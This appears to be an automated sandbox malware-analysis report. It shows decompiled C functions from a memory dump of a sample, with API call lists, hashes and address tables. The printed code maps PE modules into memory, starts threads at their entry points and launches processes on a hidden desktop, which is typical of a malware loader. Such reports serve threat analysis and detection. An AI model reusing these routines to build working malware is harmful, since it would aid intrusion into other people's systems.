0x00a8a097
0x00a8a099
0x00a8a09a
0x00a8a090
0x00a8a0a3
0x00a8a0a5
0x00a8a0a8
0x00a8a0ae
0x00a8a0b3
0x00a8a0b6
0x00a8a0b9
0x00a8a0bc
0x00a8a0c0
0x00a8a0c3
0x00a8a0c6
0x00a8a0ca
0x00a8a0cd
0x00a8a0cd
0x00a8a0d0
0x00a8a0d2
0x00a8a0d2
0x00a8a0d8
0x00a8a0e0
0x00a8a0e0
0x00a8a0e2
0x00a8a0e7
0x00a8a0e9
0x00a8a0ea
0x00a8a0e0
0x00a8a0f3
0x00a8a0f5
0x00a8a0f8
0x00a8a0fe
0x00a8a103
0x00a8a106
0x00a8a107
0x00a8a107
0x00a8a10a
0x00a8a10c
0x00a8a10c
0x00a8a112
0x00a8a114
0x00a8a114
0x00a8a116
0x00a8a11b
0x00a8a11d
0x00a8a11e
0x00a8a114
0x00a8a127
0x00a8a129
0x00a8a12c
0x00a8a132
0x00a8a137
0x00a8a13a
0x00a8a13b
0x00a8a13b
0x00a8a13e
0x00a8a140
0x00a8a140
0x00a8a146
0x00a8a148
0x00a8a148
0x00a8a14a
0x00a8a14f
0x00a8a151
0x00a8a152
0x00a8a148
0x00a8a15b
0x00a8a160
0x00a8a166
0x00a8a169
0x00a8a179

APIs

GetProcessHeap.KERNEL32(00000000,00000001,?,000DBBA0), ref: 00A8A041
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00A8A048
memcpy.NTDLL(00000000,00000000,00000000,?,000DBBA0), ref: 00A8A0A8

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessmemcpy
String ID:
API String ID: 1874444438-0
Opcode ID: db05be3a02d722f8610fdf2f002c49405d0fbb11446847c6630a25ed784c13e1
Instruction ID: 9ad8fe14ad0f8a4af95f34c640894a9ff2687376350642d8ad46cb385f1409ed
Opcode Fuzzy Hash: db05be3a02d722f8610fdf2f002c49405d0fbb11446847c6630a25ed784c13e1
Instruction Fuzzy Hash: B461B4709006519FE3249F19C4C475AFBE4FF26714F38456DE88A8BB02C325AD96DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A88990, Relevance: 9.1, APIs: 6, Instructions: 95
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A88990(signed char __ecx, void* __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed char _v16;
				intOrPtr _v20;
				void* _v24;
				char _v28;
				signed char _t25;
				void* _t31;
				intOrPtr _t34;
				void* _t36;
				void _t38;
				signed char _t39;
				signed char _t41;
				signed int _t47;
				intOrPtr _t50;
				void* _t51;
				signed char _t52;

				_t52 = __ecx;
				_t50 = __ecx + __edx;
				_v8 = _t50;
				while(1) {
					_t47 = 0;
					_t41 = 0;
					_v12 = 0;
					_t39 = 0x80;
					if(_t52 >= _t50) {
						goto L6;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t39 =  *_t52;
						_t52 = _t52 + 1;
						_t47 = _t47 | (_t39 & 0x7f) << _t41;
						if(_t39 >= 0) {
							break;
						}
						_t41 = _t41 + 7;
						if(_t52 < _t50) {
							continue;
						}
						break;
					}
					_v12 = _t47;
					L6:
					_t25 =  !((_t39 & 0x000000ff) >> 7);
					if((_t25 & 0x00000001) != 0) {
						_t25 = _t47 + _t52;
						if(_t25 <= _t50) {
							_v16 = _t52;
							_t52 = _t25;
							_t25 = E00A887C0( &_v16,  &_v28);
							if(_t25 != 0) {
								_t51 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
								if(_t51 == 0) {
									L1:
									_t50 = _v8;
									continue;
								} else {
									_t31 = E00A81F40(_v24, _v20);
									 *(_t51 + 8) = _t31;
									if(_t31 == 0) {
										L15:
										HeapFree(GetProcessHeap(), 0, _t51);
										goto L1;
									} else {
										_t34 = _t31 +  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x3c)) + _t31 + 0x28));
										 *((intOrPtr*)(_t51 + 0xc)) = _t34;
										if(_t34 == 0) {
											L14:
											VirtualFree( *(_t51 + 8), 0, 0x8000);
											goto L15;
										} else {
											_t36 = CreateThread(0, 0, E00A88880, _t51, 0, 0);
											 *(_t51 + 0x10) = _t36;
											if(_t36 == 0) {
												goto L14;
											} else {
												 *((intOrPtr*)(_t51 + 4)) = _v28;
												_t38 =  *0xa8c274; // 0x0
												 *_t51 = _t38;
												 *0xa8c274 = _t51;
												goto L1;
											}
										}
									}
								}
								L17:
							}
						}
					}
					return _t25;
					goto L17;
				}
			}

0x00a88998
0x00a8899b
0x00a8899e
0x00a889a6
0x00a889a6
0x00a889a8
0x00a889aa
0x00a889ad
0x00a889b1
0x00000000
0x00000000
0x00000000
0x00000000
0x00a889b3
0x00a889b3
0x00a889b3
0x00a889b5
0x00a889be
0x00a889c2
0x00000000
0x00000000
0x00a889c4
0x00a889c9
0x00000000
0x00000000
0x00000000
0x00a889c9
0x00a889cb
0x00a889ce
0x00a889d4
0x00a889d8
0x00a889de
0x00a889e3
0x00a889e9
0x00a889f2
0x00a889f4
0x00a889fb
0x00a88a12
0x00a88a16
0x00a889a3
0x00a889a3
0x00000000
0x00a88a18
0x00a88a1e
0x00a88a23
0x00a88a28
0x00a88a7b
0x00a88a85
0x00000000
0x00a88a2a
0x00a88a31
0x00a88a33
0x00a88a36
0x00a88a6b
0x00a88a75
0x00000000
0x00a88a38
0x00a88a46
0x00a88a4c
0x00a88a51
0x00000000
0x00a88a53
0x00a88a56
0x00a88a59
0x00a88a5e
0x00a88a60
0x00000000
0x00a88a60
0x00a88a51
0x00a88a36
0x00a88a28
0x00000000
0x00a88a16
0x00a889fb
0x00a889e3
0x00a88a96
0x00000000
0x00a88a96

APIs

GetProcessHeap.KERNEL32(00000008,00000014,?,000DBBA0,?,?,?,?,?,?,?,00A88F82), ref: 00A88A05
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00A88A0C
CreateThread.KERNEL32(00000000,00000000,00A88880,00000000,00000000,00000000), ref: 00A88A46
VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,?,?,?,?,?,?,00A88F82), ref: 00A88A75
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00A88F82), ref: 00A88A7E
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00A88F82), ref: 00A88A85

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$AllocateCreateThreadVirtual
String ID:
API String ID: 1073023709-0
Opcode ID: 45b137df759f46eedd8263e4bc745c2bd02b5403a1c3fd9ed98cb7f7ac9ce940
Instruction ID: a089d0e2505d3581b9ec943ec1481c544fef04823d4346b226c1c26d47160cd5
Opcode Fuzzy Hash: 45b137df759f46eedd8263e4bc745c2bd02b5403a1c3fd9ed98cb7f7ac9ce940
Instruction Fuzzy Hash: 37313871A40602AFDB14EFA9CC85BA9F7B4FB84750F508115E545D7280EF74D801CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A82180, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80
memoryprocessCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00A82180(WCHAR* __ecx, void* _a4, struct _PROCESS_INFORMATION* _a8) {
				char _v8;
				struct _STARTUPINFOW _v76;
				int _t29;
				WCHAR* _t31;
				int _t35;
				void* _t36;

				_t35 = 0;
				_t31 = __ecx;
				memset( &_v76, 0, 0x44);
				_t36 = _a4;
				_v76.cb = 0x44;
				if(_t36 == 0) {
					return CreateProcessW(0, _t31, 0, 0, 0, 0, 0, 0,  &_v76, _a8);
				} else {
					_t5 = _t35 + 0x10; // 0x10
					E00A81830(0xa81030, _t5, 0x47deb7fb,  &_a4);
					_v76.lpDesktop = _a4;
					_push(0);
					_push(_t36);
					_push( &_v8);
					if( *0xa8c21c() != 0) {
						_t29 =  *0xa8c04c(_t36, 0, _t31, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a8);
						_t35 = _t29;
						 *0xa8c220(_v8);
					}
					HeapFree(GetProcessHeap(), 0, _a4);
					return _t35;
				}
			}

0x00a8218b
0x00a82192
0x00a82194
0x00a8219a
0x00a821a0
0x00a821a9
0x00a8223e
0x00a821ab
0x00a821b9
0x00a821bc
0x00a821c7
0x00a821cd
0x00a821ce
0x00a821cf
0x00a821d8
0x00a821f0
0x00a821f9
0x00a821fb
0x00a821fb
0x00a8220d
0x00a8221b
0x00a8221b

APIs

memset.NTDLL ref: 00A82194
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,00A8A52C), ref: 00A82232

Part of subcall function 00A81830: GetProcessHeap.KERNEL32(00000008,00A89F6B,00000000,00000000,00A81004,?,00A815F4,4DBAC13F,00A89F6B,?,00000000), ref: 00A81844
Part of subcall function 00A81830: RtlAllocateHeap.NTDLL(00000000,?,00A815F4), ref: 00A8184B

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A82206
HeapFree.KERNEL32(00000000), ref: 00A8220D

Strings

D, xrefs: 00A821A0

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCreateFreememset
String ID: D
API String ID: 3667606640-2746444292
Opcode ID: 106455ec07c5cb16b7f43819d48fcd3e93e2d1e088d046f8ae23cdf5d2d42ece
Instruction ID: a800e0845e6753383552be79d270a3183da5d5c9e4baed419f6e51e7093dce14
Opcode Fuzzy Hash: 106455ec07c5cb16b7f43819d48fcd3e93e2d1e088d046f8ae23cdf5d2d42ece
Instruction Fuzzy Hash: 2F114A76A00208BBDB10ABD5EC49EDF7F7CEB85765F004125FA0896240D6319A568BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A823F0, Relevance: 7.6, APIs: 5, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 00A82422
RtlAllocateHeap.NTDLL(00000000), ref: 00A82429
memcpy.NTDLL(00A88583,?,?), ref: 00A82467
GetProcessHeap.KERNEL32(00000000,00A88583), ref: 00A8250A
HeapFree.KERNEL32(00000000), ref: 00A82511

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememcpy
String ID:
API String ID: 461410222-0
Opcode ID: 518fd310e1408d2b68ce578d16ef5a79533b9000b4ae2130a97c19eff34979ac
Instruction ID: 5df306071f06523aac52aa1cfa58129112b53e50fe4dbf5d58c2d5ff2d15d7f2
Opcode Fuzzy Hash: 518fd310e1408d2b68ce578d16ef5a79533b9000b4ae2130a97c19eff34979ac
Instruction Fuzzy Hash: C9416A71A00209EFEB11DFE4DC88FAABBB9EF44350F144169E905E71A1E7319A04DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A82530, Relevance: 7.6, APIs: 5, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,00A88644,?), ref: 00A8256D
RtlAllocateHeap.NTDLL(00000000), ref: 00A82574
memcpy.NTDLL(00A88644,?,?), ref: 00A825AE
GetProcessHeap.KERNEL32(00000000,00A88644), ref: 00A8260C
HeapFree.KERNEL32(00000000), ref: 00A82613

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememcpy
String ID:
API String ID: 461410222-0
Opcode ID: dd33df88e86531be1fe244e5ec3bd9b8063c4e3d9daf20970f9f17d80927f748
Instruction ID: fa6015eca04546c0e38ab6bbed6f1a91754d1b4106b8260bdbef8cdc10df7755
Opcode Fuzzy Hash: dd33df88e86531be1fe244e5ec3bd9b8063c4e3d9daf20970f9f17d80927f748
Instruction Fuzzy Hash: D8318171640205FFEB11DFE4EC89BA9BBB9FF08751F200161F905E61A0E7719A619FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A88290, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A88290(int* __ecx, signed int _a8) {
				intOrPtr _t66;
				int* _t88;
				signed int _t89;
				void* _t90;

				_t89 = _a8;
				_t88 = __ecx;
				 *__ecx = 0;
				__ecx[1] = 0;
				__ecx[2] = _t89;
				__ecx[3] = (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20 >> 0x1f) + (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20) + 1;
				__ecx[5] = _t89 >> 0x0000000e & 0x00000001;
				__ecx[4] = (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20 >> 0x1f) + 1 + (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20);
				if((_t89 & 0x00008000) == 0) {
					_t17 = _t88 + 0x29272; // 0x29272
					memset(_t17, 0, 0x10000);
					_t90 = _t90 + 0xc;
				}
				_t18 = _t88 + 0x9273; // 0x9273
				 *(_t88 + 0x44) = 0;
				 *((intOrPtr*)(_t88 + 0x28)) = _t18;
				_t21 = _t88 + 0x9272; // 0x9272
				 *((intOrPtr*)(_t88 + 0x2c)) = _t21;
				_t23 = _t88 + 0x39272; // 0x39272
				_t66 = _t23;
				 *((intOrPtr*)(_t88 + 0x30)) = _t66;
				 *((intOrPtr*)(_t88 + 0x34)) = _t66;
				_t26 = _t88 + 0x8192; // 0x8192
				 *(_t88 + 0x40) = 0;
				 *(_t88 + 0x3c) = 0;
				 *(_t88 + 0x24) = 0;
				 *(_t88 + 0x20) = 0;
				 *(_t88 + 0x1c) = 0;
				 *(_t88 + 0x68) = 0;
				 *(_t88 + 0x48) = 0;
				 *(_t88 + 0x64) = 0;
				 *(_t88 + 0x60) = 0;
				 *(_t88 + 0x5c) = 0;
				 *(_t88 + 0x58) = 0;
				 *((intOrPtr*)(_t88 + 0x38)) = 8;
				 *(_t88 + 0x6c) = 0;
				 *(_t88 + 0x54) = 0;
				 *(_t88 + 0x50) = 0;
				 *(_t88 + 0x4c) = 0;
				 *((intOrPtr*)(_t88 + 0x18)) = 1;
				 *(_t88 + 0x70) = 0;
				 *(_t88 + 0x74) = 0;
				 *(_t88 + 0x78) = 0;
				 *(_t88 + 0x7c) = 0;
				 *(_t88 + 0x80) = 0;
				 *(_t88 + 0x84) = 0;
				 *(_t88 + 0x88) = 0;
				 *(_t88 + 0x8c) = 0;
				memset(_t26, 0, 0x240);
				_t52 = _t88 + 0x83d2; // 0x83d2
				memset(_t52, 0, 0x40);
				return 0;
			}

0x00a88294
0x00a882aa
0x00a882bc
0x00a882c2
0x00a882c9
0x00a882cc
0x00a882d4
0x00a882ef
0x00a882f8
0x00a882ff
0x00a88308
0x00a8830e
0x00a8830e
0x00a88311
0x00a88317
0x00a8831e
0x00a88321
0x00a88327
0x00a8832a
0x00a8832a
0x00a88335
0x00a88338
0x00a8833b
0x00a88344
0x00a8834b
0x00a88352
0x00a88359
0x00a88360
0x00a88367
0x00a8836e
0x00a88375
0x00a8837c
0x00a88383
0x00a8838a
0x00a88391
0x00a88398
0x00a8839f
0x00a883a6
0x00a883ad
0x00a883b4
0x00a883bb
0x00a883c2
0x00a883c9
0x00a883d0
0x00a883d7
0x00a883e1
0x00a883eb
0x00a883f5
0x00a883ff
0x00a88407
0x00a88410
0x00a8841e

APIs

memset.NTDLL ref: 00A88308
memset.NTDLL ref: 00A883FF
memset.NTDLL ref: 00A88410

Strings

VUUU, xrefs: 00A882CF
VUUU, xrefs: 00A88297

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: memset
String ID: VUUU$VUUU
API String ID: 2221118986-3149182767
Opcode ID: 5048f9721f2f8555580651347b35aa057dfd4051df0f7fdb2a6ba27c55bb1ff6
Instruction ID: a7897718567201970ae7f817f1d666a0fce736b8b3be34fdce2a5f590333d7e0
Opcode Fuzzy Hash: 5048f9721f2f8555580651347b35aa057dfd4051df0f7fdb2a6ba27c55bb1ff6
Instruction Fuzzy Hash: EA41CBB1600A06BBE308CF65C469782FBE4FF44718F548219D6598BB80D7BAB169CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 00A899A0, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A81830: GetProcessHeap.KERNEL32(00000008,00A89F6B,00000000,00000000,00A81004,?,00A815F4,4DBAC13F,00A89F6B,?,00000000), ref: 00A81844
Part of subcall function 00A81830: RtlAllocateHeap.NTDLL(00000000,?,00A815F4), ref: 00A8184B

_snwprintf.NTDLL ref: 00A899E3
GetProcessHeap.KERNEL32(00000000,00A88F37), ref: 00A89A5E
HeapFree.KERNEL32(00000000), ref: 00A89A65
GetProcessHeap.KERNEL32(00000000,?), ref: 00A89A70
HeapFree.KERNEL32(00000000), ref: 00A89A77

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocate_snwprintf
String ID:
API String ID: 2579732983-0
Opcode ID: c540f21d7883afe63f510dececac27c117b60af26a08ab841ee70b234451c0fd
Instruction ID: 56d71ece23cb453309aaedc7a0bfeee7df7001460905e91156c815f88575fbb1
Opcode Fuzzy Hash: c540f21d7883afe63f510dececac27c117b60af26a08ab841ee70b234451c0fd
Instruction Fuzzy Hash: 60215171A40208FBFB10EBE0AD4AFEA777DEB08711F100161FA05E51E1D7B19A568F61

Uniqueness

Uniqueness Score: -1.00%

Function 00A88AA0, Relevance: 7.5, APIs: 5, Instructions: 49
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A88AA0() {
				int _t8;
				void* _t16;
				void* _t17;

				_t17 =  *0xa8c274; // 0x0
				if(_t17 != 0) {
					do {
						_t8 =  *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0xb, 0);
						_t17 =  *_t17;
					} while (_t17 != 0);
					_t17 =  *0xa8c274; // 0x0
				}
				_t16 = 0xa8c274;
				while(_t17 != 0) {
					_t8 = WaitForSingleObject( *(_t17 + 0x10), 0xffffffff);
					if(_t8 == 0x102) {
						_t16 = _t17;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0, 0);
						VirtualFree( *(_t17 + 8), 0, 0x8000);
						CloseHandle( *(_t17 + 0x10));
						 *_t16 =  *_t17;
						_t8 = HeapFree(GetProcessHeap(), 0, _t17);
					}
					_t17 =  *_t16;
				}
				return _t8;
			}

0x00a88aa1
0x00a88aaa
0x00a88ab0
0x00a88aba
0x00a88abc
0x00a88abe
0x00a88ac2
0x00a88ac2
0x00a88ac8
0x00a88acf
0x00a88ad6
0x00a88ae1
0x00a88b1e
0x00a88ae3
0x00a88aed
0x00a88af9
0x00a88b02
0x00a88b0d
0x00a88b16
0x00a88b16
0x00a88b20
0x00a88b22
0x00a88b28

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000000,00A89315,00A89286), ref: 00A88AD6
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A88AF9
CloseHandle.KERNEL32(?), ref: 00A88B02
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A88B0F
HeapFree.KERNEL32(00000000), ref: 00A88B16

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID:
API String ID: 797926041-0
Opcode ID: d2a703eba6ed7c1f5aa47481fde1b7873a1756320b4096b4b3b43ec4109b359f
Instruction ID: 1d4658eba5d8b13d3043170fcea418e68daabda255b41228922c86b76a3dc7fd
Opcode Fuzzy Hash: d2a703eba6ed7c1f5aa47481fde1b7873a1756320b4096b4b3b43ec4109b359f
Instruction Fuzzy Hash: 7E018032900720ABDB31AF94DC48B0AB7A1FF44B20F154A14F991AB6E0CB30AC428F90

Uniqueness

Uniqueness Score: -1.00%

Function 00A888B0, Relevance: 7.5, APIs: 5, Instructions: 40
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A888B0(long __ecx) {
				int _t6;
				long _t13;
				void* _t15;
				void* _t16;

				_t16 =  *0xa8c274; // 0x0
				_t13 = __ecx;
				_t15 = 0xa8c274;
				while(_t16 != 0) {
					_t6 = WaitForSingleObject( *(_t16 + 0x10), _t13);
					if(_t6 == 0x102) {
						_t15 = _t16;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t16 + 0xc))))( *(_t16 + 8), 0, 0);
						VirtualFree( *(_t16 + 8), 0, 0x8000);
						CloseHandle( *(_t16 + 0x10));
						 *_t15 =  *_t16;
						_t6 = HeapFree(GetProcessHeap(), 0, _t16);
					}
					_t16 =  *_t15;
				}
				return _t6;
			}

0x00a888b2
0x00a888b8
0x00a888bb
0x00a888c2
0x00a888c8
0x00a888d3
0x00a88910
0x00a888d5
0x00a888df
0x00a888eb
0x00a888f4
0x00a888ff
0x00a88908
0x00a88908
0x00a88912
0x00a88914
0x00a8891b

APIs

WaitForSingleObject.KERNEL32(?,00000000,?,000DBBA0,?,00A88F3E), ref: 00A888C8
VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,00A88F3E), ref: 00A888EB
CloseHandle.KERNEL32(?,?,000DBBA0,?,00A88F3E), ref: 00A888F4
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00A88F3E), ref: 00A88901
HeapFree.KERNEL32(00000000,?,000DBBA0,?,00A88F3E), ref: 00A88908

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID:
API String ID: 797926041-0
Opcode ID: ffbf80993eaab2804e7e02597a9c2464133634d7b7ea57a4222faa0d82cdb1eb
Instruction ID: f7f095760d23365a0aa8155343d17472e550f1c4043a15c38dc1609d4248615f
Opcode Fuzzy Hash: ffbf80993eaab2804e7e02597a9c2464133634d7b7ea57a4222faa0d82cdb1eb
Instruction Fuzzy Hash: 52F04F36640610AFEB31AFE4DC8DB56B7A5FF44B21F200624F581D76A1CB74AC519FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A81E50, Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00A81E50(void* __ecx, void** __edx, long* _a4) {
				long _v8;
				long _v12;
				long _v16;
				void** _v20;
				long _t36;
				void* _t42;
				long _t46;
				void* _t49;
				void* _t52;
				void* _t53;

				_push(0);
				_v20 = __edx;
				_push( &_v8);
				_v8 = 4;
				_t42 = __ecx;
				_push( &_v16);
				_push(0x20000005);
				_push( *((intOrPtr*)(__ecx + 8)));
				if( *0xa8c238() == 0) {
					return 0;
				} else {
					_t49 = RtlAllocateHeap(GetProcessHeap(), 0, _v16);
					if(_t49 == 0) {
						return 0;
					} else {
						_v8 = 0;
						_v12 = 0;
						_t53 =  *0xa8c248( *((intOrPtr*)(_t42 + 8)), _t49, _v16,  &_v12, _t52);
						if(_t53 == 0) {
							L7:
							HeapFree(GetProcessHeap(), 0, _t49);
							if(_t53 != 0) {
								goto L8;
							}
						} else {
							while(1) {
								_t36 = _v12;
								if(_t36 == 0) {
									break;
								}
								_t46 = _v8 + _t36;
								_v8 = _t46;
								_t53 =  *0xa8c248( *((intOrPtr*)(_t42 + 8)), _t49 + _t46, _v16 - _t46,  &_v12);
								if(_t53 != 0) {
									continue;
								} else {
									goto L7;
								}
								goto L9;
							}
							if(_t53 != 0) {
								L8:
								 *_v20 = _t49;
								 *_a4 = _v8;
							} else {
								goto L7;
							}
						}
						L9:
						return _t53;
					}
				}
			}

0x00a81e57
0x00a81e5c
0x00a81e5f
0x00a81e63
0x00a81e6a
0x00a81e6c
0x00a81e6d
0x00a81e72
0x00a81e7d
0x00a81f30
0x00a81e83
0x00a81e96
0x00a81e9a
0x00a81f29
0x00a81ea0
0x00a81ea4
0x00a81eaf
0x00a81ec0
0x00a81ec4
0x00a81ef8
0x00a81f02
0x00a81f0a
0x00000000
0x00000000
0x00a81ec6
0x00a81ec6
0x00a81ec6
0x00a81ecb
0x00000000
0x00000000
0x00a81ed0
0x00a81edb
0x00a81eec
0x00a81ef0
0x00000000
0x00a81ef2
0x00000000
0x00a81ef2
0x00000000
0x00a81ef0
0x00a81ef6
0x00a81f0c
0x00a81f12
0x00a81f17
0x00000000
0x00000000
0x00000000
0x00a81ef6
0x00a81f19
0x00a81f21
0x00a81f21
0x00a81e9a

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,00A88631), ref: 00A81E89
RtlAllocateHeap.NTDLL(00000000), ref: 00A81E90
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A81EFB
HeapFree.KERNEL32(00000000), ref: 00A81F02

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

